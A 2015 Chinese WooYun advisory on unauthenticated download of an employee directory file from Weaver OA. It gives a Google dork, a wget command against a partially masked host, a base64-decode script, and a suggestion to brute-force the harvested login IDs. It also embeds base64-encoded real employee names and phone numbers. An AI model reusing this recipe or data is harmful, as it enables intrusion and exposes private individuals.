泛微OA系统敏感文件未授权访问

发表于 2015年07月28日
WooYun漏洞库

漏洞概要

缺陷编号：WooYun-2015-0129483

漏洞标题：泛微OA系统敏感文件未授权访问

相关厂商：上海泛微软件有限公司

漏洞作者：小红猪

提交时间：2015-07-28 19:15

公开时间：2015-10-28 09:48

漏洞类型：敏感信息泄露

危害等级：高

自评Rank：15

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

Tags标签：

漏洞详情

披露状态：

2015-07-28: 细节已通知厂商并且等待厂商处理中
2015-07-30: 厂商已经确认，细节仅向厂商公开
2015-08-02: 细节向第三方安全合作伙伴开放（绿盟科技、唐朝安全巡航、无声信息）
2015-09-23: 细节向核心白帽子及相关领域专家公开
2015-10-03: 细节向普通白帽子公开
2015-10-13: 细节向实习白帽子公开
2015-10-28: 细节向公众公开

简要描述：

泛微OA系统敏感文件未授权访问,可导致所有员工组织架构信息泄露,并可被用来进行暴力破解等一系列利用。

详细说明：

存在问题的文件:/messager/users.data具体版本没统计，在google上获取的大部分都存在该问题。威胁：可导致所有员工组织架构信息泄露，包括loginid、姓名、电话、手机号、邮箱、头像uri、部门、职位等。users.data文件本身是经过base64编码的，不知道拿来做啥用的。验证url：http://target/messager/users.data得到的内容类似：

解码后：

另外还有个日志泄漏的问题，貌似有人提过了，泄漏的日志里如果有loginid的话，其实也是可以暴力破解的，只要登录一个帐号，便可导出所有员工数据。base64解码：

#!/usr/bin/ python<br>
# -*- coding: utf8 -*-<br>
import base64<br>
fp1 = open('users.data','r')<br>
fp2 = open('users.data2','w')<br>
str1 = fp1.readlines()<br>
for line in str1:<br>
    str2 = base64.b64decode(line)<br>
    fp2.write(str2)<br>
fp1.close()<br>
fp2.close()

#!/usr/bin/ python

# -*- coding: utf8 -*-

import base64

fp1 = open('users.data','r')

fp2 = open('users.data2','w')

str1 = fp1.readlines()

for line in str1:

str2 = base64.b64decode(line)

fp2.write(str2)

fp1.close()

fp2.close()

提取loginid等可用正则或者bs4等。提取loginid可用正则：\b(?<=<loginid>)\w+(?=</loginid>)\b反斜杠被转义了，使用时记得去掉。

漏洞证明：

在google上搜索关键字看看。intitle:协同商务系统 inurl:login

比如这个：**.**.**.**:82/login/login4.jspwget http://**.**.**.**:82/messager/users.data

部分base64数据如下

PHVzZXJzPg0KPHJvdz48aWQ+NzYzPC9pZD48bG9naW5pZD48L2xvZ2luaWQ+PGxhc3RuYW1lPrLc<br>
896+6TwvbGFzdG5hbWU+PHNleD4xPC9zZXg+PHN1YmNvbXBhbnk+vK/Nxdfcsr88L3N1YmNvbXBh<br>
bnk+PGRlcGFydG1lbnQ+vK/NxdDQ1f7Iy8Gm18rUtLK/PC9kZXBhcnRtZW50Pjx0ZWxlcGhvbmU+<br>
ODY2NzAwMTg8L3RlbGVwaG9uZT48bW9iaWxlPjE4NjM4NjkyOTE1PC9tb2JpbGU+PGVtYWlsPjwv<br>
ZW1haWw+PG1lc3NhZ2VydXJsPi9tZXNzYWdlci91c2VyaWNvbi9sb2dpbmlkMjAxMzEyMjYxODA3<br>
NDYuanBnPC9tZXNzYWdlcnVybD48c3VwZXJpb3I+tsW35Twvc3VwZXJpb3I+PHN1cGVyaW9yaWQ+<br>
ODwvc3VwZXJpb3JpZD48am9idGl0bGU+0NDV/sjLwabXytS0sr/X3LzgPC9qb2J0aXRsZT48L3Jv<br>
dz4NCjxyb3c+PGlkPjU4OTwvaWQ+PGxvZ2luaWQ+YTAwMDEyPC9sb2dpbmlkPjxsYXN0bmFtZT7N<br>
9dHgPC9sYXN0bmFtZT48c2V4PjE8L3NleD48c3ViY29tcGFueT6608TPyPC+9Mb7s7XP+srbt/7O<br>
8dPQz965q8u+PC9zdWJjb21wYW55PjxkZXBhcnRtZW50PsjwvvTG87ncsr88L2RlcGFydG1lbnQ+<br>
PHRlbGVwaG9uZT48L3RlbGVwaG9uZT48bW9iaWxlPjEzNzgzNjcwNTc3PC9tb2JpbGU+PGVtYWls<br>
PjwvZW1haWw+PG1lc3NhZ2VydXJsPi9tZXNzYWdlci9pbWFnZXMvaWNvbl93LmpwZzwvbWVzc2Fn<br>
ZXJ1cmw+PHN1cGVyaW9yPsH1yPC7qjwvc3VwZXJpb3I+PHN1cGVyaW9yaWQ+NDM2PC9zdXBlcmlv<br>
cmlkPjxqb2J0aXRsZT7I8L70xvO53LK/vq3A7Twvam9idGl0bGU+PC9yb3c+DQo8cm93PjxpZD4z<br>
PC9pZD48bG9naW5pZD48L2xvZ2luaWQ+PGxhc3RuYW1lPuqwt8k8L2xhc3RuYW1lPjxzZXg+MDwv<br>
c2V4PjxzdWJjb21wYW55PryvzcXX3LK/PC9zdWJjb21wYW55PjxkZXBhcnRtZW50PryvzcXX3L6t<br>
sOw8L2RlcGFydG1lbnQ+PHRlbGVwaG9uZT4wMzcxLTYwMTAzMzc3PC90ZWxlcGhvbmU+PG1vYmls<br>
ZT4xMzYzMzgzOTg3OTwvbW9iaWxlPjxlbWFpbD48L2VtYWlsPjxtZXNzYWdlcnVybD4vbWVzc2Fn<br>
ZXIvaW1hZ2VzL2ljb25fbS5qcGc8L21lc3NhZ2VydXJsPjxzdXBlcmlvcj65+ce/PC9zdXBlcmlv<br>
cj48c3VwZXJpb3JpZD4xMDU8L3N1cGVyaW9yaWQ+PGpvYnRpdGxlPryvzcXX3L6twO3W+sDtPC9q<br>
b2J0aXRsZT48L3Jvdz4NCjxyb3c+PGlkPjQ8L2lkPjxsb2dpbmlkPnhzZ3N6amJ5c3k8L2xvZ2lu<br>
aWQ+PGxhc3RuYW1lPs/6ytu5q8u+19y+rbDs1KTL49SxPC9sYXN0bmFtZT48c2V4PjA8L3NleD48<br>
c3ViY29tcGFueT6608TP0MLKwLzNxvuztc/6ytu3/s7x09DP3rmry748L3N1YmNvbXBhbnk+PGRl<br>
cGFydG1lbnQ+z/rK29fcvq2w7DwvZGVwYXJ0bWVudD48dGVsZXBob25lPjwvdGVsZXBob25lPjxt<br>
b2JpbGU+PC9tb2JpbGU+PGVtYWlsPjwvZW1haWw+PG1lc3NhZ2VydXJsPi9tZXNzYWdlci9pbWFn<br>
ZXMvaWNvbl9tLmpwZzwvbWVzc2FnZXJ1cmw+PHN1cGVyaW9yPrn5x+w8L3N1cGVyaW9yPjxzdXBl<br>
cmlvcmlkPjQyPC9zdXBlcmlvcmlkPjxqb2J0aXRsZT6yv8PF1KTL49SxPC9qb2J0aXRsZT48L3Jv

PHVzZXJzPg0KPHJvdz48aWQ+NzYzPC9pZD48bG9naW5pZD48L2xvZ2luaWQ+PGxhc3RuYW1lPrLc

896+6TwvbGFzdG5hbWU+PHNleD4xPC9zZXg+PHN1YmNvbXBhbnk+vK/Nxdfcsr88L3N1YmNvbXBh

bnk+PGRlcGFydG1lbnQ+vK/NxdDQ1f7Iy8Gm18rUtLK/PC9kZXBhcnRtZW50Pjx0ZWxlcGhvbmU+

ODY2NzAwMTg8L3RlbGVwaG9uZT48bW9iaWxlPjE4NjM4NjkyOTE1PC9tb2JpbGU+PGVtYWlsPjwv

ZW1haWw+PG1lc3NhZ2VydXJsPi9tZXNzYWdlci91c2VyaWNvbi9sb2dpbmlkMjAxMzEyMjYxODA3

NDYuanBnPC9tZXNzYWdlcnVybD48c3VwZXJpb3I+tsW35Twvc3VwZXJpb3I+PHN1cGVyaW9yaWQ+

ODwvc3VwZXJpb3JpZD48am9idGl0bGU+0NDV/sjLwabXytS0sr/X3LzgPC9qb2J0aXRsZT48L3Jv

dz4NCjxyb3c+PGlkPjU4OTwvaWQ+PGxvZ2luaWQ+YTAwMDEyPC9sb2dpbmlkPjxsYXN0bmFtZT7N

9dHgPC9sYXN0bmFtZT48c2V4PjE8L3NleD48c3ViY29tcGFueT6608TPyPC+9Mb7s7XP+srbt/7O

8dPQz965q8u+PC9zdWJjb21wYW55PjxkZXBhcnRtZW50PsjwvvTG87ncsr88L2RlcGFydG1lbnQ+

PHRlbGVwaG9uZT48L3RlbGVwaG9uZT48bW9iaWxlPjEzNzgzNjcwNTc3PC9tb2JpbGU+PGVtYWls

PjwvZW1haWw+PG1lc3NhZ2VydXJsPi9tZXNzYWdlci9pbWFnZXMvaWNvbl93LmpwZzwvbWVzc2Fn

ZXJ1cmw+PHN1cGVyaW9yPsH1yPC7qjwvc3VwZXJpb3I+PHN1cGVyaW9yaWQ+NDM2PC9zdXBlcmlv

cmlkPjxqb2J0aXRsZT7I8L70xvO53LK/vq3A7Twvam9idGl0bGU+PC9yb3c+DQo8cm93PjxpZD4z

PC9pZD48bG9naW5pZD48L2xvZ2luaWQ+PGxhc3RuYW1lPuqwt8k8L2xhc3RuYW1lPjxzZXg+MDwv

c2V4PjxzdWJjb21wYW55PryvzcXX3LK/PC9zdWJjb21wYW55PjxkZXBhcnRtZW50PryvzcXX3L6t

sOw8L2RlcGFydG1lbnQ+PHRlbGVwaG9uZT4wMzcxLTYwMTAzMzc3PC90ZWxlcGhvbmU+PG1vYmls

ZT4xMzYzMzgzOTg3OTwvbW9iaWxlPjxlbWFpbD48L2VtYWlsPjxtZXNzYWdlcnVybD4vbWVzc2Fn

ZXIvaW1hZ2VzL2ljb25fbS5qcGc8L21lc3NhZ2VydXJsPjxzdXBlcmlvcj65+ce/PC9zdXBlcmlv

cj48c3VwZXJpb3JpZD4xMDU8L3N1cGVyaW9yaWQ+PGpvYnRpdGxlPryvzcXX3L6twO3W+sDtPC9q

b2J0aXRsZT48L3Jvdz4NCjxyb3c+PGlkPjQ8L2lkPjxsb2dpbmlkPnhzZ3N6amJ5c3k8L2xvZ2lu

aWQ+PGxhc3RuYW1lPs/6ytu5q8u+19y+rbDs1KTL49SxPC9sYXN0bmFtZT48c2V4PjA8L3NleD48

c3ViY29tcGFueT6608TP0MLKwLzNxvuztc/6ytu3/s7x09DP3rmry748L3N1YmNvbXBhbnk+PGRl

cGFydG1lbnQ+z/rK29fcvq2w7DwvZGVwYXJ0bWVudD48dGVsZXBob25lPjwvdGVsZXBob25lPjxt

b2JpbGU+PC9tb2JpbGU+PGVtYWlsPjwvZW1haWw+PG1lc3NhZ2VydXJsPi9tZXNzYWdlci9pbWFn

ZXMvaWNvbl9tLmpwZzwvbWVzc2FnZXJ1cmw+PHN1cGVyaW9yPrn5x+w8L3N1cGVyaW9yPjxzdXBl

cmlvcmlkPjQyPC9zdXBlcmlvcmlkPjxqb2J0aXRsZT6yv8PF1KTL49SxPC9qb2J0aXRsZT48L3Jv

解码后：

可以看到有7000多行数据。各家公司赶紧自查吧。

修复方案：

1、users.data这个文件不知道是做啥用的，不建议保存在网站目录内。

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：12

确认时间：2015-07-3009:46

厂商回复：

CNVD确认并复现所述情况，已经由CNVD通过以往联系渠道向软件生产厂商邮件通报，由其后续提供解决方案。

评价

2010-01-01 00:00 Seven.Sea 白帽子 | Rank:44 漏洞数:5)
这不是早就有了...

原文连接：泛微OA系统敏感文件未授权访问 所有媒体，可在保留署名、原文连接的情况下转载，若非则不得使用我方内容。